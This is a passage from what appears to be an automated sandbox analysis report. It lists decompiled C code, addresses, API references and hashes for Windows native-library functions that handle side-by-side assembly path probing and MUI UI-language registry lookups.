											 *(_t145 + 2) = _t199;
											_t174 = _t145;
											goto L23;
										}
										_t193 = 0xc0000017;
										goto L24;
									}
									_t145 = _v552;
									 *(_t145 + 4) = _t189;
									_t189 = 0;
									_v556 = 0;
									goto L52;
								} else {
									memcpy( *(_t172 + 4), _t189, _t165 & 0x0000ffff);
									_t174 = _v580;
									L23:
									_t187 = _v584;
									 *_t187 = _t174;
									_t147 = (_t165 & 0x0000ffff) +  *((intOrPtr*)(_t174 + 4));
									_t175 = 0x5c;
									 *_t147 = _t175;
									 *((short*)(_t147 + 2)) = 0;
									 *( *_t187) = _v560 + 2;
									_v548 = _v548 & 0x00000000;
									_t193 = 0;
									 *_v544 = _v548;
									L24:
									_t103 = _v588;
									if(_t103 != 0) {
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t103);
										_t189 = _v556;
									}
									goto L26;
								}
							}
						}
					}
				}
			}































































                                                                                                                            0x6b20cf7c
                                                                                                                            0x6b20cf7f
                                                                                                                            0x6b20cf82
                                                                                                                            0x6b20cf85
                                                                                                                            0x6b20cf8e
                                                                                                                            0x6b20cf99
                                                                                                                            0x6b20cf9c
                                                                                                                            0x6b20cfa4
                                                                                                                            0x6b20cfab
                                                                                                                            0x6b20cfad
                                                                                                                            0x6b20cfb3
                                                                                                                            0x6b20cfb9
                                                                                                                            0x6b20cfbf
                                                                                                                            0x6b20cfc5
                                                                                                                            0x6b20cfcb
                                                                                                                            0x6b20cfd1
                                                                                                                            0x6b20cfd7
                                                                                                                            0x6b20cfdd
                                                                                                                            0x6b20cfe3
                                                                                                                            0x6b20cfeb
                                                                                                                            0x6b20cfed
                                                                                                                            0x6b20cfed
                                                                                                                            0x6b20cfef
                                                                                                                            0x6b20cffb
                                                                                                                            0x6b20d003
                                                                                                                            0x6b20d005
                                                                                                                            0x6b20d005
                                                                                                                            0x6b20d00d
                                                                                                                            0x6b24afc1
                                                                                                                            0x6b24afc7
                                                                                                                            0x6b24afc8
                                                                                                                            0x6b24afc9
                                                                                                                            0x6b24afca
                                                                                                                            0x6b24afcb
                                                                                                                            0x6b24afcc
                                                                                                                            0x6b24afdc
                                                                                                                            0x6b24afe4
                                                                                                                            0x00000000
                                                                                                                            0x6b20d03f
                                                                                                                            0x6b20d03f
                                                                                                                            0x6b20d042
                                                                                                                            0x6b20d047
                                                                                                                            0x6b20d050
                                                                                                                            0x6b20d055
                                                                                                                            0x6b20d059
                                                                                                                            0x6b20d05c
                                                                                                                            0x6b24ae41
                                                                                                                            0x6b24ae47
                                                                                                                            0x6b24ae4e
                                                                                                                            0x6b24ae4e
                                                                                                                            0x6b24ae41
                                                                                                                            0x6b20d05c
                                                                                                                            0x6b20d068
                                                                                                                            0x6b20d06a
                                                                                                                            0x6b20d075
                                                                                                                            0x6b24ae56
                                                                                                                            0x6b24ae5b
                                                                                                                            0x6b24ae5d
                                                                                                                            0x6b24ae5f
                                                                                                                            0x6b24ae67
                                                                                                                            0x6b20d230
                                                                                                                            0x6b20d232
                                                                                                                            0x6b20d261
                                                                                                                            0x6b20d261
                                                                                                                            0x6b20d23e
                                                                                                                            0x6b20d245
                                                                                                                            0x6b24afee
                                                                                                                            0x6b24aff4
                                                                                                                            0x6b24aff4
                                                                                                                            0x6b20d250
                                                                                                                            0x6b20d251
                                                                                                                            0x6b20d254
                                                                                                                            0x6b20d25d
                                                                                                                            0x6b20d25d
                                                                                                                            0x6b20d080
                                                                                                                            0x6b24ae71
                                                                                                                            0x6b24ae7a
                                                                                                                            0x6b24ae7c
                                                                                                                            0x6b24ae84
                                                                                                                            0x6b24aea1
                                                                                                                            0x00000000
                                                                                                                            0x6b24aea1
                                                                                                                            0x6b24ae8f
                                                                                                                            0x6b24ae97
                                                                                                                            0x00000000
                                                                                                                            0x6b20d086
                                                                                                                            0x6b20d086
                                                                                                                            0x6b20d08c
                                                                                                                            0x6b20d08f
                                                                                                                            0x6b20d095
                                                                                                                            0x6b20d09d
                                                                                                                            0x6b20d0a8
                                                                                                                            0x6b20d0b1
                                                                                                                            0x6b24aeab
                                                                                                                            0x6b24aeac
                                                                                                                            0x6b24aeaf
                                                                                                                            0x6b24aeaf
                                                                                                                            0x6b20d0b7
                                                                                                                            0x6b20d0c5
                                                                                                                            0x6b20d0dc
                                                                                                                            0x6b20d0f1
                                                                                                                            0x6b20d102
                                                                                                                            0x6b20d112
                                                                                                                            0x6b24aec0
                                                                                                                            0x6b24aec8
                                                                                                                            0x00000000
                                                                                                                            0x6b20d118
                                                                                                                            0x6b20d118
                                                                                                                            0x6b20d11e
                                                                                                                            0x6b20d124
                                                                                                                            0x6b20d12d
                                                                                                                            0x6b24aed2
                                                                                                                            0x6b24aede
                                                                                                                            0x6b24aee4
                                                                                                                            0x6b20d133
                                                                                                                            0x6b20d133
                                                                                                                            0x6b20d133
                                                                                                                            0x6b20d135
                                                                                                                            0x6b20d141
                                                                                                                            0x6b20d143
                                                                                                                            0x6b20d14f
                                                                                                                            0x6b20d151
                                                                                                                            0x6b20d158
                                                                                                                            0x6b20d162
                                                                                                                            0x6b20d163
                                                                                                                            0x6b20d16e
                                                                                                                            0x6b20d178
                                                                                                                            0x6b20d179
                                                                                                                            0x6b20d17f
                                                                                                                            0x6b20d18a
                                                                                                                            0x6b20d18c
                                                                                                                            0x6b20d194
                                                                                                                            0x6b24aef2
                                                                                                                            0x6b24aef6
                                                                                                                            0x6b24aefc
                                                                                                                            0x6b24aeff
                                                                                                                            0x6b24af15
                                                                                                                            0x6b24af1a
                                                                                                                            0x6b24af20
                                                                                                                            0x6b24af20
                                                                                                                            0x6b24aef6
                                                                                                                            0x6b20d19c
                                                                                                                            0x6b24af32
                                                                                                                            0x6b24af5c
                                                                                                                            0x6b24af44
                                                                                                                            0x6b24af44
                                                                                                                            0x6b24af4f
                                                                                                                            0x6b24af54
                                                                                                                            0x00000000
                                                                                                                            0x6b20d1a2
                                                                                                                            0x6b20d1a2
                                                                                                                            0x6b20d1a8
                                                                                                                            0x6b20d1b4
                                                                                                                            0x6b24af6e
                                                                                                                            0x6b24af89
                                                                                                                            0x6b24af91
                                                                                                                            0x6b24af96
                                                                                                                            0x6b24afa8
                                                                                                                            0x6b24afad
                                                                                                                            0x6b24afb6
                                                                                                                            0x6b24afb6
                                                                                                                            0x6b24afba
                                                                                                                            0x00000000
                                                                                                                            0x6b24afba
                                                                                                                            0x6b24af98
                                                                                                                            0x00000000
                                                                                                                            0x6b24af98
                                                                                                                            0x6b24af70
                                                                                                                            0x6b24af76
                                                                                                                            0x6b24af79
                                                                                                                            0x6b24af7b
                                                                                                                            0x00000000
                                                                                                                            0x6b20d1ba
                                                                                                                            0x6b20d1c2
                                                                                                                            0x6b20d1c7
                                                                                                                            0x6b20d1d0
                                                                                                                            0x6b20d1d0
                                                                                                                            0x6b20d1db
                                                                                                                            0x6b20d1dd
                                                                                                                            0x6b20d1e0
                                                                                                                            0x6b20d1e1
                                                                                                                            0x6b20d1e6
                                                                                                                            0x6b20d1f5
                                                                                                                            0x6b20d204
                                                                                                                            0x6b20d20b
                                                                                                                            0x6b20d20d
                                                                                                                            0x6b20d20f
                                                                                                                            0x6b20d20f
                                                                                                                            0x6b20d217
                                                                                                                            0x6b20d225
                                                                                                                            0x6b20d22a
                                                                                                                            0x6b20d22a
                                                                                                                            0x00000000
                                                                                                                            0x6b20d217
                                                                                                                            0x6b20d1b4
                                                                                                                            0x6b20d19c
                                                                                                                            0x6b20d112
                                                                                                                            0x6b20d080

                                                                                                                            APIs
                                                                                                                            • memcpy.1105(?,00000010,?,00000040,?,?), ref: 6B20D09D
                                                                                                                            • memcpy.1105(00000000,00000010,00000000,00000040,?,?), ref: 6B20D0C5
                                                                                                                            • RtlDosPathNameToRelativeNtPathName_U.1105(?,?,00000000,?,?,?,?,00000040,?,?), ref: 6B20D10B
                                                                                                                            • ZwOpenFile.1105(?,00100020,?,?,00000003,00000021,?,?,00000000,?,?,?,?,00000040,?,?), ref: 6B20D185
                                                                                                                            • memcpy.1105(00000010,?,?,?,00100020,?,?,00000003,00000021,?,?,00000000,?), ref: 6B20D1C2
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,?,00000000,?,?,?,?,00000040,?,?), ref: 6B20D225
                                                                                                                            • RtlDeleteBoundaryDescriptor.1105(?,?,00000000,?,?,?,?,00000040,?,?), ref: 6B20D261
                                                                                                                              • Part of subcall function 6B1DAD30: RtlFreeHeap.1105(?,00000000,00000001,?,6B2002E9,00000000,?,6B1EECFB,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?), ref: 6B1DAD43
                                                                                                                            • ZwClose.1105(00000010,?,00100020,?,?,00000003,00000021,?,?,00000000,?,?,?,?,00000040,?), ref: 6B24AEFF
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000010,?,00100020,?,?,00000003,00000021,?,?,00000000,?), ref: 6B24AF15
                                                                                                                            Strings
                                                                                                                            • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 6B24AFCE
                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 6B24AEB8
                                                                                                                            • @, xrefs: 6B20D16E
                                                                                                                            • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 6B24AE87
                                                                                                                            • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 6B24AFD3
                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 6B24AF46
                                                                                                                            • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 6B24AE56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeapmemcpy$Path$BoundaryCloseDeleteDescriptorFileNameName_OpenRelative
                                                                                                                            • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                                                            • API String ID: 1343436988-541586583
                                                                                                                            • Opcode ID: c3ffe4e1be7a788e147a7f0c6046588738a87613617d0039bb7705f942772398
                                                                                                                            • Instruction ID: bffd0d8b12bd975a5cfb3e019330b384bf71f7688f56d28785ae101e3c59b958
                                                                                                                            • Opcode Fuzzy Hash: c3ffe4e1be7a788e147a7f0c6046588738a87613617d0039bb7705f942772398
                                                                                                                            • Instruction Fuzzy Hash: A7C1B07194122DAFDB248F19CCC8BAAB7F4AF55745F1140E9E80CA7291E7398E81CF91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DEC9B, Relevance: 40.6, APIs: 14, Strings: 9, Instructions: 320nativememoryCOMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E6B1DEC9B(intOrPtr __ecx, signed int _a4, intOrPtr _a8, char* _a12, intOrPtr* _a16) {
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				long _v88;
				void* _v92;
				intOrPtr _v96;
				void* _v100;
				intOrPtr _v104;
				char _v108;
				long _v112;
				char _v116;
				char _v117;
				char _v120;
				signed int _v124;
				char _v125;
				char _v128;
				unsigned int _v132;
				signed int _v136;
				void* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				void* _v152;
				char _v156;
				void* _v168;
				void* _v172;
				void* _v180;
				void* _v192;
				void* _t107;
				void* _t108;
				void* _t119;
				void* _t126;
				WCHAR* _t135;
				char _t140;
				void* _t155;
				char* _t168;
				long _t169;
				void* _t174;
				char _t179;
				void* _t180;
				void* _t182;
				void* _t189;
				signed int _t191;
				void* _t193;
				signed int _t195;
				signed int _t197;
				void* _t199;

				_t199 = (_t197 & 0xfffffff8) - 0x74;
				_t168 = _a12;
				_v104 = __ecx;
				_v100 = 0;
				_v112 = 0;
				_v108 = 0;
				_v96 = 7;
				_v92 = 0;
				_v88 = 0;
				_v117 = 0;
				_t189 = 0;
				_v116 = 0;
				if(__ecx == 0 || _t168 == 0 || _a16 == 0) {
					_t193 = 0xc000000d;
					goto L43;
				} else {
					_t195 = _a4;
					 *_t168 = 0;
					if(_t195 == 1 || _t195 == 0) {
						RtlInitUnicodeString( &_v84, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
						_v84 = 0x18;
						_v76 =  &_v92;
						_v116 = 0;
						_push( &_v84);
						_push(0x20019);
						_v80 = 0;
						_push( &_v116);
						_v72 = 0x40;
						_v68 = 0;
						_v64 = 0;
						if(E6B219600() >= 0) {
							_t126 = E6B1DBAA0(_v116, _v112,  &_v124);
							_t189 = _v136;
							_t193 = _t126;
							if(_t193 != 0 || _t189 == 0) {
								_t179 = _v116;
								_t195 = _a4;
								goto L7;
							} else {
								goto L44;
							}
						} else {
							_t179 = 0;
							_v116 = 0;
							L7:
							if(_t195 == 1 && _t179 != 0 && E6B28D191(_t179,  &_v125) >= 0) {
								asm("sbb eax, eax");
								_a4 = _t195 &  ~(_v125 - 0x00000001 & 0x000000ff);
							}
							_t185 = 0;
							_t180 = 0x2000000;
							_t193 = E6B1DF108(0, _t179, _t179,  &_v108);
							if(_t193 < 0) {
								L45:
								 *_t168 = 1;
								goto L43;
							} else {
								if(_a4 != 1) {
									RtlInitUnicodeString( &_v92, L"Control Panel\\Desktop\\MuiCached");
									_t193 = 0;
									_v40 = _v116;
									_v36 =  &_v100;
									_push( &_v44);
									_push(0x20019);
									_v128 = 0;
									_push( &_v128);
									_v44 = 0x18;
									 *((intOrPtr*)(_t199 + 0x80)) = 0x40;
									 *((intOrPtr*)(_t199 + 0x84)) = 0;
									 *((intOrPtr*)(_t199 + 0x88)) = 0;
									if(E6B219600() < 0) {
										 *_t168 = 1;
										L44:
										_t174 = 0;
										L17:
										_t115 = _a4;
										if(_a4 != 0 || _t189 != 0 &&  *((intOrPtr*)(_t189 + 4)) != _t174) {
											_t171 = _v104;
											L21:
											if(_t189 == 0) {
												_t189 = E6B1E7608(1, _t185 & 0xffffff00 | _t115 != 0x00000001, _t171);
												if(_t189 == 0) {
													_t193 = 0xc0000017;
												}
											}
											goto L23;
										} else {
											_t171 = _v104;
											_t119 = E6B28E0E9(_v104, _t168,  &_v116);
											_t189 = _v124;
											_t193 = _t119;
											if(_t193 != 0) {
												L23:
												 *_a16 = _t189;
												L24:
												_t107 = _v88;
												if(_t107 == 0) {
													L48:
													_t169 = 0;
													L26:
													if(_v112 != 0) {
														_push(_v112);
														E6B2195D0();
														_v116 = _t169;
													}
													_t108 = _v100;
													if(_t108 != 0) {
														if(_t108 != 0xffffffff) {
															 *0x6b1b6cc4(_t108);
														}
														_v100 = _t169;
													}
													if(_v108 != 0) {
														_push(_v108);
														E6B2195D0();
													}
													goto L33;
												}
												_t169 = 0;
												RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t107);
												goto L26;
											}
											_t115 = _a4;
											goto L21;
										}
									}
									_t135 = L"MachinePreferredUILanguages";
									L15:
									RtlInitUnicodeString( &_v100, _t135);
									_push(_t180);
									_t185 =  &_v108;
									_t182 = E6B1DF018(_v136,  &_v108,  &_v120, _t193,  &_v116);
									_t193 = 0xc0000034;
									if(_t182 != 0xc0000034) {
										_t140 = _v120;
										if(_t140 == 0) {
											goto L16;
										}
										if(_t182 != 0x80000005) {
											goto L48;
										}
										_t191 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _t140 + 2);
										_v124 = _t191;
										if(_t191 == 0) {
											_t193 = 0xc0000017;
											goto L48;
										}
										_push(_t182);
										_t185 =  &_v120;
										_t193 = E6B1DF018(_v148,  &_v120,  &_v132, _t191,  &_v128);
										if(_t193 < 0) {
											L42:
											_t189 = _v156;
											L43:
											if(_t193 != 0) {
												goto L24;
											}
											goto L44;
										}
										if(_v136 != 7) {
											if(_v136 == 1) {
												goto L41;
											}
											_t189 = _v156;
											_t174 = 0;
											_t193 = 0;
											 *_t168 = 1;
											goto L17;
										}
										L41:
										_t185 = _t191;
										_t193 = E6B1E38A4(_v144, _t191, _v132 >> 1, 8, (0 | _v132 >> 0x00000001 != 0x00000000) + 2, 1,  &_v156);
										goto L42;
									}
									L16:
									_t174 = 0;
									 *_t168 = 1;
									_t193 = 0;
									goto L17;
								}
								_t155 = E6B1DE420(_v108, _v112,  &_v124);
								_t189 = _v136;
								_t193 = _t155;
								if(_t193 == 0) {
									if(_t189 != 0) {
										goto L23;
									}
								}
								RtlInitUnicodeString( &_v92, L"Control Panel\\Desktop");
								_t180 = 0;
								_v64 = _v116;
								_v60 =  &_v100;
								_push( &_v68);
								_push(0x20019);
								_v128 = 0;
								_push( &_v128);
								_v68 = 0x18;
								_v56 = 0x40;
								_v52 = 0;
								_v48 = 0;
								_t193 = E6B219600();
								if(_t193 < 0) {
									goto L45;
								}
								_t135 = L"PreferredUILanguages";
								if(_a8 != 3) {
									_t135 = L"PreferredUILanguagesPending";
								}
								_t193 = 0;
								goto L15;
							}
						}
					} else {
						_t193 = 0xc000000d;
						L33:
						return _t193;
					}
				}
			}



























































                                                                                                                            0x6b1deca3
                                                                                                                            0x6b1deca7
                                                                                                                            0x6b1decae
                                                                                                                            0x6b1decb2
                                                                                                                            0x6b1decb6
                                                                                                                            0x6b1decba
                                                                                                                            0x6b1decbe
                                                                                                                            0x6b1decc6
                                                                                                                            0x6b1decca
                                                                                                                            0x6b1decce
                                                                                                                            0x6b1decd4
                                                                                                                            0x6b1decd6
                                                                                                                            0x6b1decdc
                                                                                                                            0x6b235952
                                                                                                                            0x00000000
                                                                                                                            0x6b1decf3
                                                                                                                            0x6b1decf3
                                                                                                                            0x6b1decf6
                                                                                                                            0x6b1decfb
                                                                                                                            0x6b1ded0f
                                                                                                                            0x6b1ded18
                                                                                                                            0x6b1ded20
                                                                                                                            0x6b1ded2a
                                                                                                                            0x6b1ded2e
                                                                                                                            0x6b1ded2f
                                                                                                                            0x6b1ded38
                                                                                                                            0x6b1ded3c
                                                                                                                            0x6b1ded3d
                                                                                                                            0x6b1ded45
                                                                                                                            0x6b1ded49
                                                                                                                            0x6b1ded54
                                                                                                                            0x6b2358d5
                                                                                                                            0x6b2358da
                                                                                                                            0x6b2358de
                                                                                                                            0x6b2358e2
                                                                                                                            0x6b2358ec
                                                                                                                            0x6b2358f0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1ded5a
                                                                                                                            0x6b1ded5a
                                                                                                                            0x6b1ded5c
                                                                                                                            0x6b1ded60
                                                                                                                            0x6b1ded63
                                                                                                                            0x6b235914
                                                                                                                            0x6b235918
                                                                                                                            0x6b235918
                                                                                                                            0x6b1ded71
                                                                                                                            0x6b1ded76
                                                                                                                            0x6b1ded80
                                                                                                                            0x6b1ded84
                                                                                                                            0x6b1df002
                                                                                                                            0x6b1df002
                                                                                                                            0x00000000
                                                                                                                            0x6b1ded8a
                                                                                                                            0x6b1ded8e
                                                                                                                            0x6b1def03
                                                                                                                            0x6b1def0c
                                                                                                                            0x6b1def0e
                                                                                                                            0x6b1def16
                                                                                                                            0x6b1def1e
                                                                                                                            0x6b1def1f
                                                                                                                            0x6b1def28
                                                                                                                            0x6b1def2c
                                                                                                                            0x6b1def2d
                                                                                                                            0x6b1def35
                                                                                                                            0x6b1def40
                                                                                                                            0x6b1def47
                                                                                                                            0x6b1def55
                                                                                                                            0x6b1df007
                                                                                                                            0x6b1deffb
                                                                                                                            0x6b1deffb
                                                                                                                            0x6b1dee5a
                                                                                                                            0x6b1dee5a
                                                                                                                            0x6b1dee5f
                                                                                                                            0x6b1dee73
                                                                                                                            0x6b1dee77
                                                                                                                            0x6b1dee79
                                                                                                                            0x6b1dee8a
                                                                                                                            0x6b1dee8e
                                                                                                                            0x6b235983
                                                                                                                            0x6b235983
                                                                                                                            0x6b1dee8e
                                                                                                                            0x00000000
                                                                                                                            0x6b23595c
                                                                                                                            0x6b235962
                                                                                                                            0x6b235968
                                                                                                                            0x6b23596d
                                                                                                                            0x6b235971
                                                                                                                            0x6b235975
                                                                                                                            0x6b1dee94
                                                                                                                            0x6b1dee97
                                                                                                                            0x6b1dee99
                                                                                                                            0x6b1dee99
                                                                                                                            0x6b1dee9f
                                                                                                                            0x6b1df011
                                                                                                                            0x6b1df011
                                                                                                                            0x6b1deeb7
                                                                                                                            0x6b1deebc
                                                                                                                            0x6b1deebe
                                                                                                                            0x6b1deec2
                                                                                                                            0x6b1deec7
                                                                                                                            0x6b1deec7
                                                                                                                            0x6b1deecb
                                                                                                                            0x6b1deed1
                                                                                                                            0x6b1deed6
                                                                                                                            0x6b1deed9
                                                                                                                            0x6b1deed9
                                                                                                                            0x6b1deedf
                                                                                                                            0x6b1deedf
                                                                                                                            0x6b1deee8
                                                                                                                            0x6b23598d
                                                                                                                            0x6b235991
                                                                                                                            0x6b235991
                                                                                                                            0x00000000
                                                                                                                            0x6b1deee8
                                                                                                                            0x6b1deeac
                                                                                                                            0x6b1deeb2
                                                                                                                            0x00000000
                                                                                                                            0x6b1deeb2
                                                                                                                            0x6b23597b
                                                                                                                            0x00000000
                                                                                                                            0x6b23597b
                                                                                                                            0x6b1dee5f
                                                                                                                            0x6b1def5b
                                                                                                                            0x6b1dee20
                                                                                                                            0x6b1dee26
                                                                                                                            0x6b1dee2b
                                                                                                                            0x6b1dee3b
                                                                                                                            0x6b1dee44
                                                                                                                            0x6b1dee46
                                                                                                                            0x6b1dee4d
                                                                                                                            0x6b1def65
                                                                                                                            0x6b1def6b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1def77
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1def91
                                                                                                                            0x6b1def93
                                                                                                                            0x6b1def99
                                                                                                                            0x6b1df00c
                                                                                                                            0x00000000
                                                                                                                            0x6b1df00c
                                                                                                                            0x6b1def9b
                                                                                                                            0x6b1defab
                                                                                                                            0x6b1defb4
                                                                                                                            0x6b1defb8
                                                                                                                            0x6b1defef
                                                                                                                            0x6b1defef
                                                                                                                            0x6b1deff3
                                                                                                                            0x6b1deff5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1deff5
                                                                                                                            0x6b1defbf
                                                                                                                            0x6b23593c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b235942
                                                                                                                            0x6b235946
                                                                                                                            0x6b235948
                                                                                                                            0x6b23594a
                                                                                                                            0x00000000
                                                                                                                            0x6b23594a
                                                                                                                            0x6b1defc5
                                                                                                                            0x6b1defd0
                                                                                                                            0x6b1defed
                                                                                                                            0x00000000
                                                                                                                            0x6b1defed
                                                                                                                            0x6b1dee53
                                                                                                                            0x6b1dee53
                                                                                                                            0x6b1dee55
                                                                                                                            0x6b1dee58
                                                                                                                            0x00000000
                                                                                                                            0x6b1dee58
                                                                                                                            0x6b1deda1
                                                                                                                            0x6b1deda6
                                                                                                                            0x6b1dedaa
                                                                                                                            0x6b1dedae
                                                                                                                            0x6b235922
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b235928
                                                                                                                            0x6b1dedbe
                                                                                                                            0x6b1dedc7
                                                                                                                            0x6b1dedc9
                                                                                                                            0x6b1dedd1
                                                                                                                            0x6b1dedd9
                                                                                                                            0x6b1dedda
                                                                                                                            0x6b1dede3
                                                                                                                            0x6b1dede7
                                                                                                                            0x6b1dede8
                                                                                                                            0x6b1dedf0
                                                                                                                            0x6b1dedf8
                                                                                                                            0x6b1dedfc
                                                                                                                            0x6b1dee05
                                                                                                                            0x6b1dee09
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1dee13
                                                                                                                            0x6b1dee18
                                                                                                                            0x6b23592d
                                                                                                                            0x6b23592d
                                                                                                                            0x6b1dee1e
                                                                                                                            0x00000000
                                                                                                                            0x6b1dee1e
                                                                                                                            0x6b1ded84
                                                                                                                            0x6b2358be
                                                                                                                            0x6b2358be
                                                                                                                            0x6b1deeee
                                                                                                                            0x6b1deef6
                                                                                                                            0x6b1deef6
                                                                                                                            0x6b1decfb

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 6B1DED0F
                                                                                                                            • ZwOpenKey.1105(?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 6B1DED4D
                                                                                                                            • RtlpLoadUserUIByPolicy.1105(?,?,?,00000000,00000000,?,?,?,?,?,00020019,00000018,?,?,?,?), ref: 6B1DEDA1
                                                                                                                            • RtlInitUnicodeString.1105(?,Control Panel\Desktop,?,?,?,00000000,00000000,?,?,?,?,?,00020019,00000018), ref: 6B1DEDBE
                                                                                                                            • ZwOpenKey.1105(00000007,00020019,00000040,?,Control Panel\Desktop,?,?,?,00000000,00000000,?,?,?,?,?,00020019), ref: 6B1DEE00
                                                                                                                            • RtlInitUnicodeString.1105(?,PreferredUILanguages,00000007,00020019,00000040,?,Control Panel\Desktop,?,?,?,00000000,00000000,?), ref: 6B1DEE26
                                                                                                                            • RtlFreeHeap.1105(?,00000000,?,00000000,00000000,?,?,?,?,?,00020019,00000018,?,?,?,?), ref: 6B1DEEB2
                                                                                                                            • ZwClose.1105(00000000,?,00000000,?,00000000,00000000,?,?,?,?,?,00020019,00000018), ref: 6B1DEEC2
                                                                                                                            • ZwClose.1105(?,?,00000000,?,00000000,00000000,?,?,?,?,?,00020019,00000018), ref: 6B1DEED9
                                                                                                                            • RtlInitUnicodeString.1105(?,Control Panel\Desktop\MuiCached,00000000,00000000,?,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings), ref: 6B1DEF03
                                                                                                                            • ZwOpenKey.1105(?,?,?,?,00000007,00020019,?,?,Control Panel\Desktop\MuiCached,00000000,00000000,?,?,?,?,?), ref: 6B1DEF4E
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,?,00000000,?,?,?,PreferredUILanguages,00000007,00020019,00000040,?,Control Panel\Desktop,?,?), ref: 6B1DEF8C
                                                                                                                            • ZwClose.1105(00000000,?,00000000,?,00000000,00000000,?,?,?,?,?,00020019,00000018), ref: 6B235991
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitStringUnicode$CloseOpen$Heap$AllocateFreeLoadPolicyRtlpUser
                                                                                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                            • API String ID: 3016148903-3532704233
                                                                                                                            • Opcode ID: 8df4ca203d708feb69e91cf7c208c541b76a24962a97c55364c8f71b282e0fd2
                                                                                                                            • Instruction ID: 4d765d96b02467622a4d23b36895619304a97a6639820f0b29b5dc2323abbc1f
                                                                                                                            • Opcode Fuzzy Hash: 8df4ca203d708feb69e91cf7c208c541b76a24962a97c55364c8f71b282e0fd2
                                                                                                                            • Instruction Fuzzy Hash: A8C18C72918355AFDB11CF28C880A5BF7E8BF88755F01496EF998D7240D738DA48CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F99BF, Relevance: 33.8, APIs: 16, Strings: 3, Instructions: 572COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E6B1F99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
